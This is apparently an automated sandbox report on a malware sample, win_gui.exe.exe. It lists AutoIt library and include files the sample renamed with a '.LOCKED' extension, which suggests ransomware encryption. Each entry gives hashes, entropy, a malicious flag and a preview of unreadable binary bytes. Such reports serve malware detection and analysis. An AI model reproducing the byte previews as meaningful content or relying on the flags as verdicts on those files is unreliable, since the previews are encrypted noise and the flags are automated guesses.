                                SHA-512:AB636B97864D8D43BB91E1BA2992ED86E2265219C8BE957C25EF3EEEC63FB3359EC7DFAF5DCF3E8C1ACE60673F06563410D4F5DB14ABB921A0416862C6B3825C
                                Malicious:true
                                Preview:F....f...\.[X.S..z.....6u..;......E..g...*...z.Iz.t......J..S...+/.l.........e..9)S.d.9X.....2..(....I.x._.QGR.Lz...........vrm..:..&%...:T....N....gf_".^)..)..........y.g}.y.H.cj5.?.........O.e|q?.C.f.Fgh.i..D.....}.....H.a..L.....$I.?....V7#MB...H.'..B&~.m.........zd=._....x$.!.6.4.....9.o.'.,.=.%X..k49.......<..@...n...Q...V...<.rG.1D..l.zzF9..{sZ.E..)s....yt..|...[.h{..k........7....(..R.F....rL..._........0QS..5.=.\.g.g\."..g.....\v.s.v7s....'od...y.....R.d..>.i;......1%4......j......j...M.'..-..y....aXyw.....p'd....7Dr...E..M...T...M.%p ...W..X../;.....e.).)..h...k.L~.N....=.N#.L......(....B.v....u(O.N.;...'.$..b=......o..&e..zV....!:.$z$.%..~p.T.$o...6.W....43gO.q....C.#...M...o..I....L.^. ..%..#..i..z..\.s2..$....O&t..q..".fMo....t{....v8.&4*.=........Dhj..j.h.K..(6!m..3E.4..8.]....s.mr....2...l#..I......tz....%%R...S...H...X.~3}Qd.S..^...Q......0.$P....~.\.......".g.e.}...!.9.?*.....NF?.mA<...@.H..sr0]4....E.|M....t......No.`..

                                C:\Program Files (x86)\autoit3\AutoItX\AutoItX3.Assembly.dll.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy)

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):44736
                                Entropy (8bit):7.995962492060327
                                Encrypted:true
                                SSDEEP:768:z/4xeuJ1ElyGDDdmDIyob8J20C5CxV6j0OS+MSo/usYx7BExAlMZpI0kMa:z/8PWlhFz0x40ZpiFEalMXI0va
                                MD5:501295E3810366FF26462A6046F06EF8
                                SHA1:558CB519E77EB8E3313ECD40364B7C42A86840E7
                                SHA-256:90C1533764AAEAA36FCBA6EF04B2F009717BC79783269D68110319F54E565A34
                                SHA-512:9C746FE99D0B0B4C85CF2B8A42BB1F642008EADB243AE438482FE7717A336E415FC9EC36F6DBD3705E892A40D01CAB8470DC2FC7EB4941B137CEB8205865369D
                                Malicious:true
                                Preview:.?.7f.i#n.?e4....56QO..b.*..v.A.s=Q...9@..,m/[<.....f.G.G`..U...N.......9l....O..+.~..x.a...,..LIT^...%.....m2x`..^.......x.}VT.....S.7......:o...'3.....=.G):.$S..w./.w....-........K...8..o..E.8..~.M..w..7...n/`._Uid.Z.=...CV.=g........!I.ac..!..6=.....T"$.s~.7..SA1..]...cL.U.y..!pW.....nA.H1yq..r.l....s.OY.^3.Z.XE..s.;.m_W.)"V&.\_.H.R".y..x..m.H4........0\o.@.._|.U..r.:..o.W0......+....S..]xK..B..Y...J...F.J..W.X..."..4h.x.2}.n'...".O...G..-.7.....uP..!."q&2..0...R..U>.....h...B..'!...z.a...L....../...,p:.n.Lk.j.P.*I...y....7`..5X\_...yr..{..~I.DR.M........[.._....{o..w.7ShV.........k*Qr}{kO7)5D..f{.9........)k.rM.dw.q]n\............Ws.a........ij.....j*..XT.C.....A....7..8...b]3...yl3.QV...$.--.(...c*.B=.......YI=.H.f..D...k.#..q..RQ.9....=P.E.b..=.$q.b.X!^.urs.H...o2.T.O1.....,].$.;.p...E_..c.l!{{.h.OV...cm...I.F<..($.U...a. ...u.r."K....j|...XE.:95A.+...O,]..~..sW.@..8..K....].......yG.I.S...`.Q..8..f...b-.Z...B..G9..U%.u."..z,.

                                C:\Program Files (x86)\autoit3\AutoItX\AutoItX3.Assembly.xml.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy)

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):50126
                                Entropy (8bit):7.9961025303649045
                                Encrypted:true
                                SSDEEP:1536:9w7D3ctmJzLzokJoekSEJp3biUqEsRFi88gIox0t8:9w7jlXEkJoezEJp3biUpscG0t8
                                MD5:E1C4EB68729093D7F802B9C303053E7E
                                SHA1:65CA79F744FBCC518BB13E4F7F50ACCD1D36BD20
                                SHA-256:FB9C29EC4257F1E76ACE687A995F78F934BD85D0632DB173DCCBB5E0B23B7F62
                                SHA-512:89685CABC2BB2A98E46AFD84A8E5477DFB50D193714559DE7161CC89ADAF5FA07A23C73BA230697015C34F4B03165C5364DA831A9AE11BD71F0F95E2B3A987DE
                                Malicious:true
                                Preview:..1K..N.;^a(..V..=.<...9m.V=....g...U.._k.#}.............H..........U._b..$.S........5.q...Q..b.<.e*.w......u..h..A.......\.J.... =xU.-.Jqc.D.LR?H.A$.F.D......M-...%O`..^..g....u.wExG-B.%.;k ....&..6)......72.{.&..%n.LF.=.E......}..0..!.Bm...*b...X.9........bMo........].(.ul..=7...4..B.ra...+h+.l....oAA...".....ajvZ.H.y.K.....aB.e;.#..@..^Ea....On.rB..,I....V5...>...!?..._...p-Z..pBh....n.0.T.".e.K.%.L3..qVl..W.....sw-..p..$/.XH...P...@...M...k.TE.'y.4.N.W.2...F.....K...!......{B.......dZ.t.mT5Ie.L.R.."..1>E.gJHt3.7}zLk.O.V.8.)A.s.S...I.cl.~8...sUL.....$.....d&....G2..z$.{........9.~.;,.L.=o..E..8(.....%j..8.m|.~.".....2.e..gR.F...9~.....T..C,..3._.l.....j.'...3..=.4........G'...~...}...*f.f3..^&..@f.z.2Q...:....b.~..%..1.kG..y'..z..jD........fMm..g}Y.6i#....v..T.h.m.C.......i.,P.n..w...H..u.`..,.......[.j...h..h.nF.S......9.~O.5.De..F.yi.{O.D.+..v............w$5.J....d`.L,.kF...6.v..N`s..6V*zt.....K su.1z,t8..'`..l.M..!.

                                C:\Program Files (x86)\autoit3\AutoItX\AutoItX3.PowerShell.dll.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy)

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):53952
                                Entropy (8bit):7.996142365762297
                                Encrypted:true
                                SSDEEP:1536:FvNnr+NU8JrqTpmlW1zcmyPlVcwJdqEiX6eN:RkpJrqTEl2cyidaN
                                MD5:DDC1B6C8056A292120E89D7253707226
                                SHA1:D5E031FAA5E8031F3665EE2D0D674EF9A85C9E9D
                                SHA-256:4C02B1AA311CD87A5A68BF26168FDBE9BB395690FD95AB4C4AD24EEEE070776D
                                SHA-512:45C19766C51FC3D945D4761AB0FE05B3F76F348732FFB6411057DD1910FB4E0D886994CFDCF32581F534DDA1C605591C78645821B4FD530106A1370960F7BEA8
                                Malicious:true
                                Preview:S.I.^.u..$6$.w.X$..Cg.U..)...8l_R.....2....;...Y...CE.J.....|..K....!.-...]...pr.f.0.l(t.*Y..{.u..NcF.k...........U.x7@.h.....SM...*Z"O.t..^".X.v...7.{.U...?k...c,v..:.3..rU..<.v6|...\...y..,..L..#.Uy....#I.(.x..o*.....F..".{...]x.....,....#Ebd..$.9.O....W..O+P+r./.s=.7....;..[..7.L.......'LG.@O.x|.......8..0..I.(....F.B.K._,.)s,...wv..3...k.y`.......kh-V.d..k...PN.6.&b..4dc.q.....B..G.J(..&.....E'..BK.|.v.Y>....K...Z..m..JC.Y...EXr...`.I.I4...~..;dY..jo..8...a."............#...8.....(V...%..j..YQ=6.!..>......:..E71>...b.8&.5.........p. .}..h;...3.....E...&..B-.......Z......:....M...=....\.....U..:RH|.&E......a.5~o.s(...e.q.=...Bp.H.W.OJ..N}.2{.@...Y.f'.n.Wz.eZd.A.M,...0V{k....X....0/-rOJ..F.<L....at.U.l.X....7.#.......,..K..a...C...b$.|l........I.E.{`......|........1....vDs5U.`^..........y.>,.,6..T.U.s.O...I...*.6....m..........|.(p....M5..9..?.....J.3by=......tE9.....lSp.D6........Y............K%....$\......Q@.aU."....`.tt..N.U.t.

                                C:\Program Files (x86)\autoit3\AutoItX\AutoItX3.dll.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy)

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):727248
                                Entropy (8bit):7.54530492891434
                                Encrypted:false
                                SSDEEP:12288:NAv2/xE/TfXA0F1ll7I4zXXRpR4uBkrdyWbh1v/Q2G9d4lOiezp4xFuM2IL:NmWxyTfXAGRCrsE1XpY4qzubVL
                                MD5:D9ACF169A824F28B1C9D68CED0D4A8D5
                                SHA1:7F46DC43EE7099AAB844BECF0BCBCD9047DF7D95
                                SHA-256:37027F25E22A5982C1E51760D550A536C7C069EE9EC7A2C24B301BAD18BE0D59
                                SHA-512:DCABA78B8E3D40B4A55FFE4008BD08029EC5E9EF1421083BEE233BA18F76BAC9DA7AD16F80DAEBC06034046374ED078B4B5FA7258A5C45E292CF69EF2643A0B8
                                Malicious:false
                                Preview:.....?.^.L.%{i.ji..m.W.l...=....6WB.....c.'..K-.....B.sP. .Cy..).6A.. ...... .z.g.K;..N*E/.o.....lB6.,>...w..E..L2..U.L.K./.08.:H..2.oF<K....q...N.d..&%:H..!..Hp..]F....8<%........Q.K.LaV.B...'.....T..{F... ....?..#I.|.Z_.).S..U.sb]..Tm0.,S3.[._.u....`~....BQ..Yq.-k......f_..8-p|.}$.:.z..../$q~......._.P.n><..G..=.....,......'.:.yH..AW.$c...P..e;..B.3.'.....H..g2;Xl...yK/..tE.4.<.f.....}._\E.cB....p.8o;.n..=.u...A....37L)0(.2Y......f:l(.T..ZB..`J.H...ss...iM$Z.....F.;.,.....fE.Q...s.3D........@...._I........X.OT.S...+.V.....5.5$...f..+au}..@_.k........I^.:.3.\ox..v...)...N.~.p.?.....l..?.y..p.O<....a.6.M.nox.}|.._..6.'..?Fe.D.E..\....L+...4..........'1..u.Q+e.=nH.WZ9.c..M......./..[:....g..dE..N........0....e..K...K).A.L.....l....2b.).Vt.-.U....]8u....m9]h...$.....+..R..\.>i(.H....|9..M.AyK..._..RiZ6#...#*...4......<wM=.I$!.k<>.0...X.....V.....L<O*".O...M.|mQE.....V..4...?~LV....u....p.ab..,y..E.18.d....M..s.Y...A..{.....bU .........

                                C:\Program Files (x86)\autoit3\AutoItX\AutoItX3_DLL.h.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy)

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):13601
                                Entropy (8bit):7.983221224499428
                                Encrypted:false
                                SSDEEP:192:tYyE5lk52JOO25uOA0MwO1d6hUfDIzXwCTbz0Fj07S8Oyb1yo3/ube9B6fx+VOy:Czm2J6u/d62D4XFej0+yhtGbe92+VOy
                                MD5:228C32A343F3D291286FAC3475B996A5
                                SHA1:F27B617C47397BC4330416A1EE927EB212ED094B
                                SHA-256:5471EF50559AA7365A633D502EEBC078D0C437B00DCE68E11E5DA059B01F8B22
                                SHA-512:178A9DE7F07B8E63892DBF4F2FF083346CC57320B1F2D1EDC65378CD45AB570E16EA199FBFBA84A1C01CD855E278A1F73D09626302183286283DA94C650A6848
                                Malicious:false
                                Preview:....k.#.'.{..f...X~..3.F:...P......=..=.....T.. *...X.../....8 ......S...4JY..ym...Cm.0....../r.........pJ....-L.............. .1.......haP.<......-*...zW..({.M.A........+...p..4.a..;....j.'.fM..5s..g;h...F..]^..Y[...........K@}.).O...V.2.3.FG0%q.w.I.....|...c...V.I\$q~..|....Vo&..e..S"..G..-b..Ov....k.-?....2.I"..x.%.l..'.P.?9....-e ....=.EU..p.~.R.w|Z,M.r...t['....?.7W.Nk.....`..O.b.b....MI..+!.Ot}..X1..V]....34......U.. ..u....I..PZ...Z.mK..f...M<i..M.9..Z....E..S.k..Ud.%...@.C.R...P......0e.7......P........*..p....t.R..x~..y0...Zv...C+..M.H.D..W3.T....,.}.I&.........;.%3.V.-...;...F.Z....5?d...o.n.&m.-....}>....=..%.{..c.........~........5?.G4t...N.Aq....~....(...a....Q..$CW.)..<`i.3.2.).P..W{.d_$.........h}.rHF....DQ32...x.Lr;...j.q......i...L.r..0.....q}:.c.A.z.`oO..3...-VY.:..p.Z.E*.@j=)X.B7...m..l(._U.....@..Jf.le.<..=_..m....cB<|..M.J...R..~n..n..].f.^...../......^0G.,.....).(9.%...((.....8I{.b...P......`<.......j...U0....G_w........

                                C:\Program Files (x86)\autoit3\AutoItX\AutoItX3_DLL.lib.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy)

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):29584
                                Entropy (8bit):7.994526651388148
                                Encrypted:true
                                SSDEEP:768:+yK1t1xk6Q1cDmMt/P0MJ77mO98fl0y4tLu4LY:81q6KcD1/P0ii8by4dc
                                MD5:35E4607D6D1847E241ABB915EA0AFE85
                                SHA1:6EBF1377931629FA09E054C7224DDB7D5B9C6031
                                SHA-256:5BD93254C5164C607BDD196E17A6B723D12049A623D1666CDE9C793992667F2F
                                SHA-512:1B7B83665BFC273727BE351D43889AC1651D205A3AD2B52A639FB2D1C7D50C086409B93B4586EAD9FB51CFCDF3925F530A5B544A6535BF2B45BFAC9A8C9CCFF9
                                Malicious:true
                                Preview:..*HG[.^v..G.y.>.z.0.n.i~.*KF.g.....~Y..I.".C...S.%-.t,.H.[.8..S.H.....k.`..o.}..I..6..aM8.........."jP..p..8.B.?.C/.8\......S.Lg=./...H=....oX^{..6.al....|QT.h *.u!.k.ea...?.0.i...C...[.......''*.C/.Gc..W./..H..J.p.m9. ..R.L.\...........L6.].E'..=.....n..m.....9.X...}...K...k.P..:J..D...o......./....`X=Y.g.+..4.\>..Z0.2....U....7.l..O.7...(-.b.}M.&R._$Q.-o..a.p......?.Bnz.6.7c)..m......6..U^..vc5..c:...A1....w.....D.dp.Kf....v.O.YP.m..ru..p;?...,[...I.b..f.!.+.6j..pXtz...v.{....p.$%8...lB.....j.[.oxM...\...N.=l5....Ro.Z..w.$..Q[,....o..m]..Y....ubB....W.V.c...Q.D.L......r~hx....@..3.8A..H.!...<.....W..i%=..K...xO......(..']M.7....:.A..&..@L.r.z...jN...:?.H....q...&H.?.[;@.*.e..C.....Fe....M..[.g........W...z.1.{..X..?2.3..oC.0.....e..=....hL.......%I...f[.>.../.AL.#...0..hG....|_..C.K"...a...-..;t..D......BH...\x.k......8<..........~....i..........+..=Q.....OpO!.EpN....x.0...b....P...nd...-.$.u.!%.r.ou.. :Mv.gpN......Ie..{..3..?

                                C:\Program Files (x86)\autoit3\AutoItX\AutoItX3_x64.dll.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy)

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):921296
                                Entropy (8bit):7.15979202597751
                                Encrypted:false
                                SSDEEP:24576:2t0yRV0GZzcgyxUbCPnImH52jW5dG+Fabp:2S+V0GuHMjW5aN
                                MD5:BB5CA076A2C8CCA0930F5A6263626A43
                                SHA1:25FC19EEA2DCFC14CBC7CE86C284D16DC21FDE1F
                                SHA-256:BBED363836AE4C1F64C78443C44F699C103F6F22CE522883CCD3FA1F046CD050
                                SHA-512:3F2E88551F326EB443681C64B753F29909FA41A5448DAA98CA0EC3899C6C846C4C555481EFD4519021CA9B3CFCECDEA2DF36F89AABA053F9D67BD6068AD47D17
                                Malicious:false
                                Preview:..}_-c..M@./....j..(1...%..nf..JJ...._..)..u.zs.....8my...%3.....d........6.`.f.\..<e.....&.}}k,p.0...=.g.A.gV..a.pd.Q.n .q=(.....$.92.F......us5-z..$.*...t..E.E..e1f^..&..T..gN.......N......I..%8]prQM.7...-ydO|..2..Z.w.1.....q.^...v.j..rF.X...n.P.]...kB..>.8...R..,r..1..-..a....do.B..?I..x.......$(.6.(V...m.l...-Z*.}..,M..9>.......j..r.b.D.....w.o+.#...gNV6.. ...2..E.P.W:.0:.3...Y....4../....m.u.....g9.1..ed.2....8^!..S....c 5e&..'.7.T..h....cQ.^.K-,....;f*Q...=pt...{.S.._._,%.........J..D.....!..f;(..^.+%S..b..yb`).|...jQ..u./H...9..n.!u......}5.~A.......F]......}|.ix.A.y+........i.X....~OQ......I...31Mn6..:..x._...MmF..:.....;wP...R..x.E{*........mwP@...*........3.(N.......B...!.2.lm? "...o.L..\S.......:S...N....9.o../^.Pks.}...j..K...r.!...`..@=|D.|..=...\...yQ.1^a..%..W%..qJ...S.Z#}_..d.C..!.....7......-v]..&.....|......$^@...vzo.Z.TIns:'p.....T.j.... ..t..[....Z~n.SA(.(..l..Y..Q..|.x..K{.K.._...xG..-..M.N.iI.%..........>.+Kv...

                                C:\Program Files (x86)\autoit3\AutoItX\AutoItX3_x64_DLL.lib.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy)

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):28154
                                Entropy (8bit):7.993722721890511
                                Encrypted:true
                                SSDEEP:768:PABJTEFKs4FOV6pUbr/t+spf/KSxP9M5MeKvnj1IVPeR0H:0hEd4Fwh+G/KSxO5pKvnj6PeRO
                                MD5:EA0DA680B9484333A3BD95DF422FAD04
                                SHA1:D154E948152899B8E4842BEC241241E62695146C
                                SHA-256:B27AB290002DA1C76024494BD44D722AD3214D40B743CA5542B3DE9EE87562FF
                                SHA-512:683960C31E1D60ECD1CE5DD726052E56F152CD407BA3EC3BACAB1C129793C4AC3524F74B65A77524DC65763C034B4B4DE265E7D4FBE65E30D8794045DA61B21B
                                Malicious:true
                                Preview:.X{...|D.?.RM......>V....A.NX.&M..FZ...J{vsD. {N.%..{..E2?......I_yS..T...b.7....`....lq...1...l...9>..!.;.".u...Qx'n..<6.v;%..#/......g.pF3N.A.u.)...q h..q."g.,...$.s%su/....)|..Vcj.m.K.C....2j...c.w}...s.S|11..v.=9...wC....?...:.a+.Y9....*:,&fX.t....7.a8.e.be.$.(M..\.jpRX..s.........f..@..V2........."....h...."{j...k.-..7x.=..........F.[.3.L}.....Ab..N./...P?(:.s.-.x..k*v=4.I.l.)m...|...g>[....@..zD....P.q&.;.aT..L..O.........V.p...g.i....+ m9.+....U2.#L.k.GG~c.*..#<,l..$=...nM.hk..o.s........e.a..k?.U.'.k1DY..Ub^......f...$].w..H......L....M1_t4 .J...._.{....O..U...2...eX.&D......V......sW.`.l...*H$..5D".9.%....`..C....8..$...h..S....U....wn...6C._.M...R...1.~....p..h.|.:).W.Y9...H.'......!......6.$w..B,a.a....&nNs....m.]....uz.R.].h.h.T.....K.1D)....G...[.2....`k.....6.Dhu.@(/u'.Vz>......... U0=......7\}8.0.j..w....M..n."...J.-C.f.A..o\.eW....]o@......t7U#.....6_p........B..H@.@.o.......vd....6.?...h...vrz~.S.z..v..q.A...hJ.gV.|.\.#D.,.

                                C:\Program Files (x86)\autoit3\Include\StringConstants.au3.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy)

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):3462
                                Entropy (8bit):7.940917216573625
                                Encrypted:false
                                SSDEEP:96:vzykSMVNYouBXofDeVhm7GSKlpycLPqMevuAVOfh:rykdV6BYfDWhmCTyczqM+VOp
                                MD5:EC862B4F15B1E1B093AF21D3D30B5D54
                                SHA1:FC87989D1E58611418CAC99751C5A8F1315ED0E0
                                SHA-256:C6A55D67958D9BA421D8468B620C885AA43CCBE89F7513EBDCC96675F682622C
                                SHA-512:6BA46FEDD864068956F576BCC5359F725CB4E6A5149987015BEEB8E0D50588F14B1505DEDAFE00873315917AB2D725214664CCAC505018DCD821E97EF1EBA470
                                Malicious:false
                                Preview:...c.`o.h.......1u.$......u..Ka..M.'..i.=.......b.Y..4"...&.=.~..*i^..f...W...../X..1.n..xS-^...S9'..G...}IT.}.B.&...........)Ou.....% -.....L....+)4.`n..'.9.<.C..,.+.N.e=...`...L..t%..2...D.V.....^..?....._m.~....V..6......A...O..:......K..-..}Nn..|..E.Zfz.f/[$...Q.=."n\./\E8p......$...l....>.S.x...o......a.CO..~.,.d5.2..N..3..B.!.$FT.L.&9....k.?}..Q..*.....v.IF..T...I.....|I.R....L%..IQ...~4".-'...@(d...`.Nj..Q.!....5,... ;u.^{s.6 ......8....F?n.(..$'.oF.q.b.(.)Jd....8I./..*.q.....ZX.F.6......!.........<........Mw#{8..b..:..2.....zv.E.1..z9.Wb...a's..........?....T.)......fyS.W.I..s..O.R.....u.Iv.O.... $......:..o=....G.0.....q.@E..M]].E............e..y..|.i.xAV.S...4^......D..{....p.AKjm.5\......0F.QQ=.M....5l..!....{..#....~......_..$.}i..=.u{....LOikC.;AO.u.2`.r.F.b<x.. j.Qb.MI.....v\.&...#.[....7B.....D.zY..p.."9..*Z..b...0{.....S...WF.....Gg.;.m6.OR.r.O!].B.........>.P.|...$.R2..o.x.N....F....M.J..PON9.s....r.8/

                                C:\Program Files (x86)\autoit3\Include\StructureConstants.au3.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy)

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):64878
                                Entropy (8bit):7.997374523369192
                                Encrypted:true
                                SSDEEP:1536:mGzMDm97mWHuma/m8ogMsczPjsQ/AZJz/+jyv0U7E3kYd:mGIDm97mXma+MNCAGCV/+RR3L
                                MD5:AF6BCD827E25579D2E48FDE08714F93B
                                SHA1:46CCA749B27C16402BB064E1C07D4AE480A16EE1
                                SHA-256:0E8FF2CE34CF7F87578C0659A234B52D53C468D0F77C25EB7896B204A9125D5E
                                SHA-512:01FC0232435F459D849F1881A01B067E6475505CE18B7B1F0A474C73C6A40DD4F65F9BCA0D913DDBE498CEB00D7345C41CF1CE9BB5D1985716D760E682B6305D
                                Malicious:true
                                Preview:A.h.C....+G.w.........6.K..A...W_U.9l.sg~.]g..i.........h2o..+R8,..v?}.U.a...0.{...7@....s.S......"...u+.....Q)h.Z.qzB.E[=@N.?.B.jK.X.@_.#.x...<.!......%...{~.^.6....k...H..o.....W._.5.9....4..G..DXK:..AyB?...........q....0.*8_.^iE5..L..+....O..z<..wFX...LY.z."B.....F..q...N...h.<.e\..Di.4.5..I.9...)...9. ..,4\.ft..W....`..m.....E........T=...`*.T;..B^.B,.&...._....G5..C.......R.....GAS.46.}.G.KV...]m..9.jQ..,.@..f......zj.......Z..|k.A.9.%E...H..o...k...Dw?s1.0+....:cf...3....n]...*(...b...[1..u..QK.E..................(tZ.....0Y...o...........1..g..q..."[...!t.zs..`..%...Z..E....;R?hjI..0."f..6...&.w.t..H......QD...G.G!....*...DS...I$....pQ...9..F&/vR!..4..G....jaa.....]?\/.!."#....|..B......6.....`Q[C...V..~W.1._.k.$l+.. .,G.w.".T..b....?..}%..4;5......1O*..9v(?.M..}N...........u..7!.........J2..^A.j`Zl...@.^F..^<A'.wy..u.....A.!.....7.w...,...dI-B=.["...f).Y.o..k..E.........i"O..I.i+j.+..tN.\"...5r.........QhF^....;h.....i5.7......2d.

                                C:\Program Files (x86)\autoit3\Include\TabConstants.au3.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy)

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):6801
                                Entropy (8bit):7.972191929260046
                                Encrypted:false
                                SSDEEP:192:6fhPWgVkJwaFjVonsPAek/S68nTTd4wnZdKJyVrkJMkIh0+VOV:6fEgVIj+nsnk/SNnPrZdGErbkIh0+VOV
                                MD5:78A4C61DB2327F3F1E8AB2D36F80E681
                                SHA1:7A6D361C8CC0E8BE8CA52DAD4F3E150194BD60D6
                                SHA-256:9A10B1CBBAFF564343DC534D9EEEAC31E2AFF37A4F1EC800FF6BB6CB40453C49
                                SHA-512:56DD2C11F44E17E6884431B125105792412604104F4FEBF77D9C305B9FB3744E69470DDC8C0E8ACB43DCF8A407A33A444D964AC6416FE7C68DC1DAEE54A011B1
                                Malicious:false
                                Preview:?S....br......Z.lU...d..b....l....K...c....5.j...aK,.xF.u...AW.K@(\~..P..<.....4q.#....V.g..4,...M+Z...j...s........9.X.....>...y.<.2....A....*.x%..#2...bLLD.**..X1.....}...J{...+.t$x0...l'DDF...G....>4.)[.l...~.Ent.<.Jw.P...N..rU..oK.q)<.....p.......w...5..^....W.R..nw"..y.y6.U.......#r~.A0Jd....$...RS...M+0...9...m.f.5y..?.....O....8...ws.....+&L...[...o).@.=.X.#.....$<..[..6:.4.t.../.?..R...^.\.F{...T.[:..F&{.+...K.#.TYM.,.z.[4.....>.D..t...3J 3...@.^.......:.....+.....4..f...X.ec....F...Q..".........V..........y.....mi..<....XSB...."a.......t?.e.:.R....-an].A...0:4.......VH.....w..j.|.$.?......-..DO._.u.......|...@........=.....;...vO.Y...NI.<..X.\...S."...k..H..Q,d..f...(...Y...a.W.t.`Pl....6...1.../..,...].Fu.8.N....l.....N...VeHF...uyZ..........B....W...,@....W.BNT!......dG>......{..g`l...{}..kg6.l... j...V.U.K5H.......Iz,".P$B},....3....]g}0."Y...,.......C.{]l7R........P.B.i.B...D&j.z.<Z....(..*q.s|......Q@^...JfX.cJ.....H.H

                                C:\Program Files (x86)\autoit3\Include\Timers.au3.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy)

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):12443
                                Entropy (8bit):7.985215528092471
                                Encrypted:false
                                SSDEEP:384:Y5+dQGeZXLFStcMW47H+tkWtMFNYt5QaGCQL8lo618ZR4+VOd:5dQGCGcur+tkNYQabY8ld/Z
                                MD5:C796F4D03DFB0EF210F32E727BAD98FA
                                SHA1:AE263A8FFC9EDA3FD853471768AD3D8264C92F56
                                SHA-256:6CA4D4DA485DF413F3FEA6CD2A22798D998FF9D936044722B17B5F13EA84A3B9
                                SHA-512:5612B4CF503828AE16D3ECD1BBF2F774D99BE6ED0CCED135584D0186A4BAF51A0EB076F484AA6869739B2D180F52F35E6E49C6925C2D3F5F7406A013B1FCFC13
                                Malicious:false
                                Preview:n$.Zs%.8....:.yB..Y.t.s.......Y....hf..W4.....|=....(..........Sa...V"../h....{.Q.t..7...#]y...@.+...t<.J'6.@Y.{.#../..Y.w...y.9.[..W$U.Wa."6..-.j`;\...)j.y.B.g..pm..u....z.q2....%t~,.-I^.....P.......\.........n.....q....7Y.7X...Zw.1...E...z.'Z.~.t.G.;...dJ.g..C.....!t..Ed...A#..,...V.....\..jIC..Q[..@..D*...!.}...H......d....\.Q7.\.1A.c.W.6.Mv.<.-cO......v..Ll4.z...fx....P...(z..b...[..`..#5.a.G..]..V.<..G...T.`,...k..Y.[..3c.a.dR...../.}.+..W._.h;.1.I..O.9..r.....%.......I......... ..td.eC....f.A..^&..[..E....5.L@!..~~.3..V...LB.w.9_.F.e*K.MV..J..z%......~..[.....l.Z[ME(.....Cm...".J.m...|..O.0...n.?+I.N..........e...~.6...K[Q...Z5?T....{.x....'Zb."H.<.......G..X..D.....6%7.!'.3...1z.C........... <....UGW...".N.....J..u..+,.Y..H...R..%.:..-^J...4..ui$..h.........~r..K.z........)..}...N..a..X....4.O.c.K...{.....Vf.....f...O.......`x.....C.^..z}.....p....>......]..9#n...>,|...fn.|.V.*..R.;.p..Sm:....y........0R....PZ2..?k...../..v<.j

                                C:\Program Files (x86)\autoit3\Include\ToolTipConstants.au3.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy)

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):6134
                                Entropy (8bit):7.969404432664336
                                Encrypted:false
                                SSDEEP:96:AMD5w5uhX3YEqVaHKDXD35Ia2p4+IPDLs6LXetUmd+7mb1RsUD8mHPuspSvV0GgE:hVwE3Y7fz3H6/wU6LXet/vRzvPuSSaGx
                                MD5:7B44CCB97188BF079BB944B1BB631DFE
                                SHA1:872B85954E6362B139A7DF6DDBB6AEF75A2B13BF
                                SHA-256:9D6D33EBC9BF67174530B7516AFB035FA7070557DE1ADCA238A3887318E9BC66
                                SHA-512:EB3AB577DC02FBA9C89C3987EE37657B831E448F51D9E544E4B4973896DE626049E5FB05E0D577B51B0A2D4A52406859E594D47727F5E403391B8D5BB4DF926C
                                Malicious:false
                                Preview:.<.Z..&...........S.RB..".S=..w....Y/.E.'.'.s...xn....J..$.[....5..&G#...q.,p...4..z..I...........z....x...!.Dr}L[._B...*q\.Q.;EE.B.yt.%...=..H...t....3.L.=.Q..5q..z...<...#.Tm1.f1..4..$>.....8..... ...g5..).=W.K...iH....;.#..M=$=.j.p!...M.E. U.u..q..7.f.p. U.?..E....\b3....x...Phq...%e...TSf&.n.....A./. ..P..*4v-.}p...........xe\.=..L/!`... E..i,.k.YE4`..w.;b.h.............I..p..>.D..R`..}.+...Me...m...........m....f..B......."V.).O...]...~3G..`.'...o.......H%~.J~?.j_./.`.3.....'.8..G).wF.Dhy.%.e...[.:l5..H...E..Q.....A.32\..cyq..u^..o..h...P*..$. 